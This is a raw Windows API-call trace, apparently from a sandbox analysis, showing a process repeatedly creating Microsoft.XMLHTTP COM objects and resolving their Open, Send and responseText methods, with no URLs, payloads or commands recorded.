	[0478.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0478.025] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0478.025] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0478.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0478.026] ??2@YAPEAX_K@Z () returned 0x62f310
	[0478.026] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0478.026] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0478.026] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0478.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0478.026] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0478.026] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0478.026] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0478.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.029] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0478.029] SysStringLen (param_1=0x0) returned 0x0
	[0478.029] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0478.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0478.029] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c70) returned 0x0
	[0478.029] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0478.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0478.029] ??2@YAPEAX_K@Z () returned 0x62f330
	[0478.029] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0478.029] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0478.029] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0478.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c70) returned 0x0
	[0478.030] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c70) returned 0x3
	[0478.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0478.030] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c70, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0478.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c70, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.030] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0478.030] SysStringLen (param_1=0x0) returned 0x0
	[0478.030] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0478.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0478.030] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0478.030] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0478.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0478.031] ??2@YAPEAX_K@Z () returned 0x62f310
	[0478.031] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0478.031] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0478.031] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0478.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0478.031] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0478.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0478.031] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0478.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.031] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0478.031] SysStringLen (param_1=0x0) returned 0x0
	[0478.031] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0478.032] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0478.032] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0478.032] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0478.032] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0478.032] ??2@YAPEAX_K@Z () returned 0x62f330
	[0478.032] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0478.032] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0478.032] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0478.032] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0478.032] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0478.032] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0478.032] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0478.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.033] longjmp () 
	[0478.033] longjmp () 
	[0478.033] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0478.033] SysStringLen (param_1=0x0) returned 0x0
	[0478.033] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0478.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0478.033] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0478.033] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0478.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0478.033] ??2@YAPEAX_K@Z () returned 0x62f310
	[0478.033] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f310) 
	[0478.033] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0478.034] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0478.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0478.034] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0478.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0478.034] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0478.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.034] longjmp () 
	[0478.034] longjmp () 
	[0478.035] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0478.035] SysStringLen (param_1=0x0) returned 0x0
	[0478.035] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0478.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0478.035] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0478.035] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0478.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0478.035] ??2@YAPEAX_K@Z () returned 0x62f330
	[0478.035] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0478.035] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0478.035] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0478.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0478.035] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0478.036] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0478.036] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0478.036] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.036] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0478.036] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0478.036] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0478.738] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0478.738] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
